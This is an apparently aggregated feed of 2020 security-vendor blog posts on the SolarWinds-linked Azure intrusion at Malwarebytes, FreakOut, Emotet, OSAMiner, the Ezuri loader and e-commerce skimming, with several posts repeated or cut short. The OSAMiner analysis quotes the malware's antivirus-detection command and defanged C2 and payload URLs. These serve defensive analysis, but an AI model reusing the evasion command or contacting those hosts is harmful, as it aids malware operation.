A nation state attack leveraging software from SolarWinds has caused a ripple effect throughout the security industry, impacting multiple organizations. We first reported on the event in our December 14 blog and notified our business customers using SolarWinds asking them to take precautionary measures.

While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor. We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments. After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails. We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.

How did this impact Malwarebytes?

We received information from the Microsoft Security Response Center on December 15 about suspicious activity from a third-party application in our Microsoft Office 365 tenant consistent with the tactics, techniques and procedures (TTPs) of the same advanced threat actor involved in the SolarWinds attacks.

We immediately activated our incident response group and engaged Microsoft’s Detection and Response Team (DART). Together, we performed an extensive investigation of both our cloud and on-premises environments for any activity related to the API calls that triggered the initial alert. The investigation indicates the attackers exploited an Azure Active Directory weakness that allowed access to a limited subset of internal company emails. We do not use Azure cloud services in our production environments.

Considering the supply chain nature of the SolarWinds attack, and in an abundance of caution, we immediately performed a thorough investigation of all Malwarebytes source code, build and delivery processes, including reverse engineering our own software. Our internal systems showed no evidence of unauthorized access or compromise in any on-premises and production environments. Our software remains safe to use.

What we know: SolarWinds Attackers Also Target Administrative and Service Credentials

As the US Cybersecurity and Infrastructure Security Agency (CISA) stated, the adversary did not only rely on the SolarWinds supply-chain attack but indeed used additional means to compromise high-value targets by exploiting administrative or service credentials.

In 2019, a security researcher exposed a flaw with Azure Active Directory where one could escalate privileges by assigning credentials to applications. In September 2019, he found that the vulnerability still existed and essentially lead to backdoor access to principals’ credentials into Microsoft Graph and Azure AD Graph.

Third-party applications can be abused if an attacker with sufficient administrative privilege gains access to a tenant. A newly released CISA report reveals how threat actors may have obtained initial access by password guessing or password spraying in addition to exploiting administrative or service credentials. In our particular instance, the threat actor added a self-signed certificate with credentials to the service principal account. From there, they can authenticate using the key and make API calls to request emails via MSGraph.

For many organizations, securing Azure tenants may be a challenging task, especially when dealing with third-party applications or resellers. CrowdStrike has released a tool to help companies identify and mitigate risks in Azure Active Directory.

Coming together as an industry

While we have learned a lot of information in a relatively short period of time, there is much more yet to be discovered about this long and active campaign that has impacted so many high-profile targets. It is imperative that security companies continue to share information that can help the greater industry in times like these, particularly with such new and complex attacks often associated with nation state actors.

We would like to thank the security community, particularly FireEye, CrowdStrike, and Microsoft for sharing so many details regarding this attack. In an already difficult year, security practitioners and incident responders responded to the call of duty and worked throughout the holiday season, including our own dedicated employees. The security industry is full of exceptional people who are tirelessly defending others, and today it is strikingly evident just how essential our work is moving forward.

The post Malwarebytes targeted by Nation State Actor implicated in SolarWinds breach. Evidence suggests abuse of privileged access to Microsoft Office 365 and Azure environments appeared first on Malwarebytes Labs.

Freakout.jpg

Recently, Check Point Research (CPR) encountered several attacks that are exploiting multiple vulnerabilities on Linux devices, including some recently discovered flaws. These ongoing attacks involve a new malware variant, called ‘FreakOut.’ The goal behind these attacks is to create an IRC botnet (a collection of machines infected with malware that can be controlled remotely), which…

The post Linux users should patch now to block new “FreakOut” malware which exploits new vulnerabilities appeared first on Check Point Software.

Freakout.jpg

Recently, Check Point Research (CPR) encountered several attacks that are exploiting multiple vulnerabilities on Linux devices, including some recently discovered flaws. These ongoing attacks involve a new malware variant, called ‘FreakOut.’ The goal behind these attacks is to create an IRC botnet (a collection of machines infected with malware that can be controlled remotely), which…

The post Linux users should patch now to block new “FreakOut” malware which exploits new vulnerabilities appeared first on Check Point Software.

A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.

Es wurde eine Schwachstelle in Malwarebytes bis 3.x auf macOS (Anti-Malware Software) gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion posix_spawn der Komponente Launch Daemon. Ein Upgrade auf die Version 4.0 vermag dieses Problem zu beheben.

Una vulnerabilità di livello problematico è stata rilevata in Malwarebytes fino 3.x su macOS (Anti-Malware Software). Riguarda la funzione posix_spawn del componente Launch Daemon. L’aggiornamento alla versione 4.0 elimina questa vulnerabilità.

An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.

SDfb.jpg

An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

Read the original article: Expert launched Malvuln, a project to report flaws in malware The researcher John Page launched malvuln.com, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.

This week the team at SentinelLabs released an in-depth analysis of macOS.OSAMiner, a Monero mining trojan infecting macOS users since 2015. The authors of macOS.OSAMiner used run-only AppleScripts which made attempts at further analysis more difficult.

In 2020, the SentinelLabs Team discovered that the malware authors were evolving their evasion techniques, adding more complexity by embedding one run-only AppleScript inside another. We analyzed one of the latest samples “com.apple.4V.plist” using VMRay Analyzer. In this Malware Analysis Spotlight, we will showcase the key behaviors identified during the dynamic analysis.

Note, at the time of analysis this sample of OSAMiner had a 2/60 detection rate on VirusTotal.

OSAMiner Analysis

The “com.apple.4V.plist” file is placed in ~/Library/LaunchAgents by the original dropper and disguised as a Property list configuration file (PLIST) while it is in fact a compiled AppleScript.

Straight away, we see that a number of VMRay Threat Identifier (VTI) rules hit and the sample is classified as malicious. From the Overview Tab, we can see the main behaviors of the sample including network connectivity, file dropping behavior, and system information gathering. Now we can dig deeper into each of these characteristics.

macOS.OSAMINER - VTI rules

The Network Tab shows multiple C2 connections. The first request to budaybu100001[.]com:8080 returns the second-stage URL embedded in the string “-=-=-=” as a marker. Interestingly, there are two URLs that returned. The second one might be a fallback or used by another variant of the family.

macOS.OSAMINER - Network tab

macOS.OSAMINER - Hex Dump

The second stage is another compiled AppleScript stored at ~/Library/11.png. All downloads are performed using curl which is clearly visible in the Behavior Tab. The second stage is again executed using “osascript” and has two main tasks:

Download and extract the third stage mining payload
Write the mining configuration (pools.txt, config.txt, cpu.txt)

macOS.OSAMINER - Second Stage_curl

macOS.OSAMINER - Mining Configuration

The third stage is a zip file containing two dynamic libraries (dylibs) and finally a Mach-O binary, again disguised as a PLIST which can be clearly seen in the Files Tab.

macOS.OSAMINER - Dynamic Libraries (Dylibs)

macOS.OSAMINER - Mach-O binary

In addition, the second stage uses the system tool “caffeinate” to prevent the machine from going to sleep while the first stage will continuously query the running processes for common AV programs using the ps command:

sh -c ps ax | grep -E ‘360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac’ | grep -v grep | awk ‘{print $1}’

All of these actions are performed using sub-processes so they can be observed in the process graph and process overview.

macOS.OSAMINER - Process Overview

macOS.OSAMiner - Process Graph (2)

As we can see, this sample uses a different kind of evasion, using a rather uncommon file type, a compiled AppleScript, disguised as a PLIST file. This file type won’t have a problem running on a victim’s machine but it is difficult for security teams to analyze because of the inherent obfuscation and limited tooling available.

Running the sample in VMRay gives analysts an immediate view into the key behaviors, characteristics, and IOCs. Within 2 minutes of analysis time, analysts can see a majority of the sample’s behavior, compared to hours of manual reverse engineering. And for deeper analysis, the second and third stages are visible and available from the VMRay Analyzer Report.

IOCs

Sample
com.apple.4V.plist

df550039acad9e637c7c3ec2a629abf8b3f35faca18e58d447f490cf23f114e8

Second Stage
~/Library/11.png

ff9fa2ee1d42cbde7307c10907470e4950db5085d9cb43c3ade118da9bfe35c3

Third Stage
~/Library/Caches/com.apple.l0/ssl4.plist

97febb1aa15ad7b1c321f056f7164526eb698297e0fea0c23bd127498ba3e9bb

AV Detection Script embedded in First Stage
~/Library/k.plist

0cc04703ae218b0217e1b025de60cec82087e0774eb59b984419949cee5c2173

AV Detection Script embedded in First Stage

hxxp://www.budaybu100001[.]com:8080

hxxp://budaybu[.]com:8080/budaybu.png

hxxp://ondayon[.]com:8080/ondayon.png (possibly backup URL)

hxxp://budaybu[.]com:8080/ssl.zip

budaybu[.]com:8888 (mining pool address)

AV Detection Script embedded in First Stage

360

Keeper

MacMgr

Lemon

Malware

Avast

Avira

CleanMyMac

The post Malware Analysis Spotlight: OSAMiner Uses Run-Only AppleScripts to Evade Detection appeared first on VMRay.

Overview

Emotet malware has been around since 2014, but 2020 saw a resurgence of attacks. In September 2020, Emotet affected 14% of organizations worldwide. So, what is Emotet? And why is it so dangerous?

Emotet is a sophisticated trojan that is most commonly used as a dropper for other malware. This means that after gaining access to an Emotet-infected device, its operators can download additional malicious payloads, also known as second-stage payloads, to the compromised  machine.

Those second-stage payloads can be any type of malicious code, from other Emotet extensions and modules to other malware such as ransomware. 

Emotet is usually propagated and spread via phishing email attachments or embedded links that, once clicked or opened, launches the malicious payload. The malware then attempts to move laterally within a network by brute forcing user credentials and writing to shared drives.

Since early this year, numerous agencies and security vendors have reported a significant increase in cybercriminals targeting victims using Emotet phishing emails. This increase flags Emotet as one of the most prevalent and continuous threats.

Emotet Infection in the Wild

During 2020, Akamai was able to track some of the activity related to Emotet infection in the wild, monitoring access to websites associated with Emotet malware. According to sampled traffic from numerous geographies we were able to see a strong increase of Emotet infection in the months of February, July, and October in 2020. This uptick was also observed by other security vendors, as well.

 

Emotet_1.png

 

How to Minimize the Risk of Emotet 

As with all malware, adopting a defense-in-depth approach is your best chance of blocking Emotet early in the kill chain. A cloud-based secure web gateway (SWG) that looks at all outbound DNS and URLs can block requests to Emotet delivery sites early and before any IP connection is made. In the event that a device does get compromised, that same security control point can proactively block requests to CNC servers when the malware attempts to download secondary payloads. 

Deploying an SWG that has multiple payload analysis engines in combination with an endpoint AV or EDR is also recommended. That allows you to block the Emotet payload.

To block the initial infection, add an additional layer of protection over and above your email gateway. For example, a solution that can provide real-time protection when a malicious link is clicked and can verify the resource being requested adds additional protection and can block non-email phishing attempts, such as those delivered via social media or messaging apps. 

Finally, ensure that you continue to educate users about phishing: Do not open attachments or click on URLs… and always err on the side of caution.

GoingRogue_blog.jpg

Now more than ever, we rely on our smartphones to keep in touch with our work, our families and the world around us.  There are over 3.5 billion smartphone users worldwide, and it is estimated that over 85% of those devices – around 3 billion – run the Android OS. So it’s no surprise that…

The post Going Rogue – a Mastermind Behind Android Malware Returns with a New RAT appeared first on Check Point Software.

This blog was written by Ofer Caspi and Fernando Martinez of AT&T Alien Labs

Multiple threat actors have recently started using a Go language (Golang) tool to act as a packer and avoid Antivirus detection. Additionally, the Ezuri memory loader tool acts as a malware loader and executes its payload in memory, without writing the file to disk. While this technique is known and commonly used by Windows malware, it is less popular in Linux environments.

The loader decrypts the malicious malware and executes it using memfd create (as described in this blog in 2018). When creating a process, the system returns a file descriptor to an anonymous file in ‘/proc/PID/fd/’ which is visible only in the filesystem.

Figure 1 shows a code snippet from the loader, containing the information it uses in order to decrypt the payload using the AES algorithm.

Figure 1. Loader code snippet via Alien…

Ofer Caspi

Posted by:

Ofer Caspi

Read full post

fblike20.png googleplus20.png pinterest20.png twitter20.png email20.png rss20.png  

Our latest Global Threat Index for December 2020 has revealed that the Emotet trojan has returned to first place in the top malware list, impacting 7% of organizations globally, following a spam campaign which targeted over 100,000 users per day during the holiday season. In September and October 2020, Emotet was consistently at the top…

The post December 2020’s Most Wanted Malware: Emotet Returns as Top Malware Threat appeared first on Check Point Software.

large.png

Last week, I found a malware sample that does nothing fancy, it’s a data stealer but it has an interesting feature. It’s always interesting to have a look at the network flows generated by malware samples. For a while, attackers use GeoIP API services to test if the victim’s computer deserves to be infected… or not! By checking the public IP address used by the victim, an attacker might prevent “friends” to be infected (ex: IP addresses from the attacker’s country) or if the IP address belongs to a security vendor. On the other side, the attacker might decide to infect the computer because it is located in a specific country or belongs to the targeted organization. There is plenty of free APIs that offer this feature. The ISC API provides also the same kind of details (but only the country)

remnux@remnux:~$ curl -s https://isc.sans.edu/api/ip/195.74.193.12?json | jq ‘.ip.ascountry’
“BE”

The sample that I found (SHA256:D196E2BBCAF21D3335D72F8E2F2691474BA625E6B01C4DB41A1F91FC41A5EBDF) has a VT score of 41/69[1]. It uses the .Net framework tool regsvcs.exe[2] to execute malicious code extracted by the first stage file. The malware performs the following queries. First, it queries for the victim’s public IP address with the help of icanhazip.com:

remnux@remnux:~$ curl -s http://icanhazip.com/
81.246.x.x

The second service used is api.mylnikov.org:

remnux@remnux:~$ curl -s ‘https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0c:29:xx:xx:xx’
{“result”:404, “data”:{}, “message”:6, “desc”:”Object was not found”, “time”:1608552093}

This free service provides geolocation data for WiFi MAC addresses or BSSID. This is also useful to detect the location of the victim. The malware submits the MAC address of the default gateway (in my VM environment) or the BSSID (the MAC address of the wireless access point). In my case, it did not work of course but here is an example of valid BSSID:

remnux@remnux:~$ curl -s ‘https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0C:42:1F:65:E9’
{“result”:200, “data”:{“lat”: 45.22038682066, “range”: 141.727, “lon”: 16.54741327415, “time”: 1608560868}}

You can see that only latitude and longitude are returned in the JSON data but it’s easy to get back the country/city using another public service:

remnux@remnux:~$ curl -s ‘https://geocode.xyz/45.22,16.54?geoit=json’| jq ‘.state’
“BA”

“api.mylnikov.org” seems to be an interesting observable! 

[1] https://www.virustotal.com/gui/file/d196e2bbcaf21d3335d72f8e2f2691474ba625e6b01c4db41a1f91fc41a5ebdf/detection
[2] https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool
[3] https://www.mylnikov.org

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security ConsultantPGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

By Jon Munshaw.
Nothing was normal in 2020. Our ideas of working from offices, in-person meetings, hands-on learning and basically everything else was thrown into disarray early in the year. Since then, we defenders have had to adapt. But so have workers around the globe, and those IT and security professionals in charge of keeping those workers’ information secure.  
Adversaries saw all these changes as an opportunity to capitalize on strained health care systems, schools scrambling…
[[ This is only the beginning! Please visit the blog for the complete entry ]]

E-Commerce.jpeg

As the holiday shopping season shifts into high gear, the COVID-19 pandemic is accelerating an ongoing trend: shoppers are opting to buy online.

Rather than flooding brick-and-mortar stores — and point-of-sale (POS) machines — with sales, studies suggest a high percentage of shoppers in 2020 will be using online options and e-commerce checkout pages. And, those checkout pages are exactly what cyber criminals are targeting — injecting malicious code into them that will send payment card data directly back to the attackers in a technique some refer to as e-skimming.

For malicious cyber actors, this shift to online commerce has implications: using POS malware to steal payment card data is less profitable than it once was, especially when compared to exploiting vulnerable e-commerce checkout pages. Supporting data from IBM Security X-Force shows a drop in POS malware use, an increase in e-commerce card skimming and a general cyber criminal exodus from the POS malware scene. And, with more shoppers opting for online sales this year — a development some analysts expect will persist beyond the pandemic — these trends are likely to accelerate.

E-commerce Threats on the Rise

X-Force data indicates incidents involving e-commerce threats have increased nearly 400% since 2018. Some of these incidents have involved attacks from a collection of groups called Magecart, where threat actors inject malicious JavaScript code into e-commerce checkout pages, sending payment card data directly to the attackers. Other incidents have included SQL injection to exfiltrate data from externally hosted e-commerce servers or the creation of fake subdomains to commit fraud on e-commerce websites.

Figure 1: E-commerce incidents remediated by X-Force Incident Response, as portrayed as a percentage of total incidents from 2018-2020 (Source: X-Force)

Rising E-commerce Skimming Sophistication

As attackers focus additional energy on e-commerce card-skimming operations, their tactics have become increasingly sophisticated.

One example is online card skimmers that inject malicious JavaScript code into e-commerce checkout pages, which have evolved to incorporate anti-forensic techniques, such as self-removal, to make detection and analysis of the malicious code more difficult. In other cases, attackers have used forms of steganography to hide malicious code in images on the compromised site, as well as the stolen payment card data while exfiltrating it from compromised websites.

In addition, for threat actors involved in e-commerce skimming, checkout pages built on the same platform can enable attacks against multiple victims at once. In July 2020, researchers revealed that a Magecart group IBM tracks as Hive0059 (aka Magecart Group 8 or Keeper) compromised over 570 online shops over a three-year period. Of the compromised sites, 85% used the same underlying platform. With e-commerce skimming attacks, one vulnerability can help attackers automate the same attack for many others, harvesting card data that can impact a large number of shoppers.

As e-commerce is set to explode this holiday season, card skimming continues to be increasingly profitable and threat actors are likely to continually adapt and improve their techniques.

As E-commerce Threats Rise, POS Malware is in Decline

POS malware planted on physical payment processing devices has enabled threat actors to steal payment card data from terminals at retail stores, hotels, restaurants and other establishments since at least 2008. Several large-scale POS malware attacks brought this attack type to the headlines particularly in 2014 — including the Target breach that affected 41 million payment card accounts, and signaled the heyday of this attack type.

POS malware remained popular through 2017, but as chip-and-PIN technologies are being used by more card issuers worldwide, the effectiveness of POS malware has been decreasing.  

Chip-and-PIN equipped cards — also known as EMV (Europay, MasterCard and Visa, the originators of the technology) — encrypt card data during a transaction, hindering an attacker’s ability to scrape the data from a payment card terminal. Often, attackers are seeking to steal payment card information to turn around and sell that data on the darknet for a profit. The lower the number of payment cards the attacker can steal, the lower their profit. Ultimately, attackers are finding POS malware not profitable enough to continue these attacks in the same volume as in 2014-2017.

What IBM Data Tells Us: POS Malware Attacks Have Declined Since 2018

Looking at X-Force data from 2020, a continual decline in POS malware is most notable in the retail sector, which has experienced the vast majority of POS malware attacks X-Force has remediated in past years. In 2018, POS malware attacks in the retail sector made up 13% of all attacks in that industry. In 2019, that percentage shrank to 6%; in 2020, although some attacks were reported globally, our team did not respond to any POS malware attacks on retail organizations.

Figure 2: POS Malware Attacks Against Retail Have Decreased Significantly Since 2018 (Source: X-Force)

Similarly, IBM Managed Security Services (MSS) data gathered from our monitored customers demonstrates a similar trend. Compared to the typical volume of network traffic associated with active malware strains, 2020 showed minuscule detections for POS malware across all sectors.

While X-Force data suggests that POS malware attacks are becoming rare in 2020, other vendors continue to see sporadic attacks. According to one report from Visa, threat actors in May and June 2020, were using various types of POS malware in attempts to harvest payment card data from victimized merchants. In addition, an X-Force search on VirusTotal for six well-known POS malware families returned around 2,000 samples that have recent detections and have been submitted and compiled on or after Oct. 1, 2020.

Even so, it is unclear how successful contemporary POS malware attacks are. One new strain of POS malware discovered in November was designed to harvest only cardholders’ names, rather than payment card information — suggesting that some POS malware attackers in 2020 are intentionally targeting only personally identifying information, rather than full payment card information.

Regardless of their success, X-Force analysts recognize that POS malware is not gone just yet.

Financially Motivated Actors Exiting the POS Malware Scene

X-Force researchers are following closely several groups who in the past have actively deployed POS malware on merchants across the world. Two such groups in particular — ITG08 and ITG14 — appear to have broadened their attack arsenal, diversifying to other types of cyber crime, and potentially exiting the POS malware scene altogether.

ITG08

An advanced cyber criminal group X-Force tracks as ITG08 has campaign overlap with FIN6 and has been active since at least April 2016. Historically, this group has focused on deploying POS malware — particularly the FrameworkPOS malware — and then stealing payment card data and posting this for sale on the darknet. However, X-Force and other vendors’ research from 2019 suggests that ITG08 has expanded its operations to include e-commerce card skimmers — online transactions where a credit card is not physically present — and is connected to e-commerce card group Magecart Group 6.

Some security researchers believe ITG08 has been involved in ransomware operations. The group has reportedly been involved in Ryuk and LockerGoga ransomware attacks in 2019. Additionally, X-Force observed a threat actor using tactics and techniques very similar to ITG08 attempt to deploy MegaCortex ransomware 2019. Therefore, X-Force analysts consider it plausible that ITG08 actors have expanded operations beyond payment card theft to ransomware operations — a segment of the cyber crime market that is becoming increasingly lucrative. The comparative income-generating opportunities from ransomware compared to POS malware may even, conceivably, have prompted ITG08 to exit the POS malware market.

X-Force incident response has not observed ITG08 deploy POS malware since 2018. And, threat intelligence analysts are not aware that any other vendors have observed this group deploying POS malware in 2020, either.

ITG14

A separate advanced cybercriminal group IBM tracks as ITG14 shares campaign overlap with FIN7. This group also has aggressively deployed POS malware on victim networks in the past. According to the U.S. Department of Justice, as of 2018 this group had stolen more than 15 million credit card numbers from over 3,600 businesses in the U.S. alone.

In mid-2020, X-Force researchers were able to identify ITG14 as at least one affiliate group propagating the Sodinokibi ransomware. A 64-bit Carbanak backdoor used in a Sodinokibi ransomware attack observed by X-Force matched a backdoor known to be used by ITG14, and not attributed to any other group. For this reason, X-Force analysts assess that ITG14 has widened its attack activity to include ransomware attacks. It is possible that ITG14 is devoting more attention to ransomware operations in 2020, given the comparable profitability of Sodinokibi ransomware operations — pulling in over $100 million in 2020 by October alone, according to one interview with a Sodinokibi actor. While ITG14 would receive only a portion of the ransomware payments for the options in which the group was involved, these profits are still likely to be higher than those associated with POS malware attacks in 2020.

Will POS Malware Decline into Oblivion?

While POS malware is in considerable decline in 2020, it has the potential to rise again if cyber criminals find new ways of circumventing chip-and-PIN technologies.

In July 2020, security blogger Brian Krebs indicated that several U.S. merchants had suffered attacks that sidestepped chip card security controls. The problem associated with chip-and-PIN controls in that case appeared to be a security misconfiguration on the part of the card issuer, where backend systems accepted transactions with information that should have been specific to one transaction only.

Even so, cases of circumventing chip-and-PIN technologies appear to be rare. The profitability of POS malware attacks is declining over time, pushing threat actors out of the POS malware scene and into e-commerce skimming, as well as other more lucrative attack methodologies. X-Force analysts are reluctant to conclude that POS malware is dead, given the potential for malware innovation. At least for now, prior POS malware actors appear to be focusing more attention on e-commerce payment card theft, ransomware attacks and potentially other attack types.

Shifting Focus to E-commerce Protection, Ransomware Response

As X-Force observes fewer POS malware attacks each year, e-commerce payment card theft attacks are rising in its place. The threat actors who once dominated the POS malware space have now expanded — and probably moved on — to focus on e-commerce attacks and ransomware operations. This development suggests that retail, restaurant, hotel and other establishments frequently targeted for payment card data will want to focus security on e-commerce threats or even to prepare for ransomware attacks. 

X-Force analysts recommend assessing risk from relevant threats, preparing incident response plans for e-commerce and ransomware attacks and rehearsing incident response plans to ensure that teams can respond quickly and effectively if ever an incident is discovered.

Recommendations
Implement a strategy to prevent unauthorized data theft, especially as it applies to uploading large amounts of data to legitimate cloud storage platforms that attackers can abuse.
Harden web applications and underlying infrastructure to prevent malicious code injection.
Encrypt card data in transit and at rest to protect customer data from unauthorized use if it is ever compromised.
Establish and maintain offline data backups to assist in rapid recovery should data be lost due to a ransomware attack.
Employ user behavior analytics to identify potential security incidents.
Employ multifactor authentication on all access points into an enterprise network.
Use penetration testing to identify weak points in enterprise networks and vulnerabilities that should be prioritized for patching.
Plan and rehearse incident response procedures for cases of a data breach or ransomware threat.

The post E-Commerce Skimming is the New POS Malware appeared first on Security Intelligence.

E-Commerce.jpeg

As the holiday shopping season shifts into high gear, the COVID-19 pandemic is accelerating an ongoing trend: shoppers are opting to buy online.

Rather than flooding brick-and-mortar stores — and point-of-sale (POS) machines — with sales, studies suggest a high percentage of shoppers in 2020 will be using online options and e-commerce checkout pages. And, those checkout pages are exactly what cyber criminals are targeting — injecting malicious code into them that will send payment card data directly back to the attackers in a technique some refer to as e-skimming.

For malicious cyber actors, this shift to online commerce has implications: using POS malware to steal payment card data is less profitable than it once was, especially when compared to exploiting vulnerable e-commerce checkout pages. Supporting data from IBM Security X-Force shows a drop in POS malware use, an increase in e-commerce card skimming and a general cyber criminal exodus from the POS malware scene. And, with more shoppers opting for online sales this year — a development some analysts expect will persist beyond the pandemic — these trends are likely to accelerate.

E-commerce Threats on the Rise

X-Force data indicates incidents involving e-commerce threats have increased nearly 400% since 2018. Some of these incidents have involved attacks from a collection of groups called Magecart, where threat actors inject malicious JavaScript code into e-commerce checkout pages, sending payment card data directly to the attackers. Other incidents have included SQL injection to exfiltrate data from externally hosted e-commerce servers or the creation of fake subdomains to commit fraud on e-commerce websites.

Figure 1: E-commerce incidents remediated by X-Force Incident Response, as portrayed as a percentage of total incidents from 2018-2020 (Source: X-Force)

Rising E-commerce Skimming Sophistication

As attackers focus additional energy on e-commerce card-skimming operations, their tactics have become increasingly sophisticated.

One example is online card skimmers that inject malicious JavaScript code into e-commerce checkout pages, which have evolved to incorporate anti-forensic techniques, such as self-removal, to make detection and analysis of the malicious code more difficult. In other cases, attackers have used forms of steganography to hide malicious code in images on the compromised site, as well as the stolen payment card data while exfiltrating it from compromised websites.

In addition, for threat actors involved in e-commerce skimming, checkout pages built on the same platform can enable attacks against multiple victims at once. In July 2020, researchers revealed that a Magecart group IBM tracks as Hive0059 (aka Magecart Group 8 or Keeper) compromised over 570 online shops over a three-year period. Of the compromised sites, 85% used the same underlying platform. With e-commerce skimming attacks, one vulnerability can help attackers automate the same attack for many others, harvesting card data that can impact a large number of shoppers.

As e-commerce is set to explode this holiday season, card skimming continues to be increasingly profitable and threat actors are likely to continually adapt and improve their techniques.

As E-commerce Threats Rise, POS Malware is in Decline

POS malware planted on physical payment processing devices has enabled threat actors to steal payment card data from terminals at retail stores, hotels, restaurants and other establishments since at least 2008. Several large-scale POS malware attacks brought this attack type to the headlines particularly in 2014 — including the Target breach that affected 41 million payment card accounts, and signaled the heyday of this attack type.

POS malware remained popular through 2017, but as chip-and-PIN technologies are being used by more card issuers worldwide, the effectiveness of POS malware has been decreasing.  

Chip-and-PIN equipped cards — also known as EMV (Europay, MasterCard and Visa, the originators of the technology) — encrypt card data during a transaction, hindering an attacker’s ability to scrape the data from a payment card terminal. Often, attackers are seeking to steal payment card information to turn around and sell that data on the darknet for a profit. The lower the number of payment cards the attacker can steal, the lower their profit. Ultimately, attackers are finding POS malware not profitable enough to continue these attacks in the same volume as in 2014-2017.

What IBM Data Tells Us: POS Malware Attacks Have Declined Since 2018

Looking at X-Force data from 2020, a continual decline in POS malware is most notable in the retail sector, which has experienced the vast majority of POS malware attacks X-Force has remediated in past years. In 2018, POS malware attacks in the retail sector made up 13% of all attacks in that industry. In 2019, that percentage shrank to 6%; in 2020, although some attacks were reported globally, our team did not respond to any POS malware attacks on retail organizations.

Figure 2: POS Malware Attacks Against Retail Have Decreased Significantly Since 2018 (Source: X-Force)

Similarly, IBM Managed Security Services (MSS) data gathered from our monitored customers demonstrates a similar trend. Compared to the typical volume of network traffic associated with active malware strains, 2020 showed minuscule detections for POS malware across all sectors.

While X-Force data suggests that POS malware attacks are becoming rare in 2020, other vendors continue to see sporadic attacks. According to one report from Visa, threat actors in May and June 2020, were using various types of POS malware in attempts to harvest payment card data from victimized merchants. In addition, an X-Force search on VirusTotal for six well-known POS malware families returned around 2,000 samples that have recent detections and have been submitted and compiled on or after Oct. 1, 2020.

Even so, it is unclear how successful contemporary POS malware attacks are. One new strain of POS malware discovered in November was designed to harvest only cardholders’ names, rather than payment card information — suggesting that some POS malware attackers in 2020 are intentionally targeting only personally identifying information, rather than full payment card information.

Regardless of their success, X-Force analysts recognize that POS malware is not gone just yet.

Financially Motivated Actors Exiting the POS Malware Scene

X-Force researchers are following closely several groups who in the past have actively deployed POS malware on merchants across the world. Two such groups in particular — ITG08 and ITG14 — appear to have broadened their attack arsenal, diversifying to other types of cyber crime, and potentially exiting the POS malware scene altogether.

ITG08

An advanced cyber criminal group X-Force tracks as ITG08 has campaign overlap with FIN6 and has been active since at least April 2016. Historically, this group has focused on deploying POS malware — particularly the FrameworkPOS malware — and then stealing payment card data and posting this for sale on the darknet. However, X-Force and other vendors’ research from 2019 suggests that ITG08 has expanded its operations to include e-commerce card skimmers — online transactions where a credit card is not physically present — and is connected to e-commerce card group Magecart Group 6.

Some security researchers believe ITG08 has been involved in ransomware operations. The group has reportedly been involved in Ryuk and LockerGoga ransomware attacks in 2019. Additionally, X-Force observed a threat actor using tactics and techniques very similar to ITG08 attempt to deploy MegaCortex ransomware 2019. Therefore, X-Force analysts consider it plausible that ITG08 actors have expanded operations beyond payment card theft to ransomware operations — a segment of the cyber crime market that is becoming increasingly lucrative. The comparative income-generating opportunities from ransomware compared to POS malware may even, conceivably, have prompted ITG08 to exit the POS malware market.

X-Force incident response has not observed ITG08 deploy POS malware since 2018. And, threat intelligence analysts are not aware that any other vendors have observed this group deploying POS malware in 2020, either.

ITG14

A separate advanced cybercriminal group IBM tracks as ITG14 shares campaign overlap with FIN7. This group also has aggressively deployed POS malware on victim networks in the past. According to the U.S. Department of Justice, as of 2018 this group had stolen more than 15 million credit card numbers from over 3,600 businesses in the U.S. alone.

In mid-2020, X-Force researchers were able to identify ITG14 as at least one affiliate group propagating the Sodinokibi ransomware. A 64-bit Carbanak backdoor used in a Sodinokibi ransomware attack observed by X-Force matched a backdoor known to be used by ITG14, and not attributed to any other group. For this reason, X-Force analysts assess that ITG14 has widened its attack activity to include ransomware attacks. It is possible that ITG14 is devoting more attention to ransomware operations in 2020, given the comparable profitability of Sodinokibi ransomware operations — pulling in over $100 million in 2020 by October alone, according to one interview with a Sodinokibi actor. While ITG14 would receive only a portion of the ransomware payments for the options in which the group was involved, these profits are still likely to be higher than those associated with POS malware attacks in 2020.

Will POS Malware Decline into Oblivion?

While POS malware is in considerable decline in 2020, it has the potential to rise again if cyber criminals find new ways of circumventing chip-and-PIN technologies.

In July 2020, security blogger Brian Krebs indicated that several U.S. merchants had suffered attacks that sidestepped chip card security controls. The problem associated with chip-and-PIN controls in that case appeared to be a security misconfiguration on the part of the card issuer, where backend systems accepted transactions with information that should have been specific to one transaction only.

Even so, cases of circumventing chip-and-PIN technologies appear to be rare. The profitability of POS malware attacks is declining over time, pushing threat actors out of the POS malware scene and into e-commerce skimming, as well as other more lucrative attack methodologies. X-Force analysts are reluctant to conclude that POS malware is dead, given the potential for malware innovation. At least for now, prior POS malware actors appear to be focusing more attention on e-commerce payment card theft, ransomware attacks and potentially other attack types.

Shifting Focus to E-commerce Protection, Ransomware Response

As X-Force observes fewer POS malware attacks each year, e-commerce payment card theft attacks are rising in its place. The threat actors who once dominated the POS malware space have now expanded — and probably moved on — to focus on e-commerce attacks and ransomware operations. This development suggests that retail, restaurant, hotel and other establishments frequently targeted for payment card data will want to focus security on e-commerce threats or even to prepare for ransomware attacks. 

X-Force analysts recommend assessing risk from relevant threats, preparing incident response plans for e-commerce and ransomware attacks and rehearsing incident response plans to ensure that teams can respond quickly and effectively if ever an incident is discovered.

Recommendations
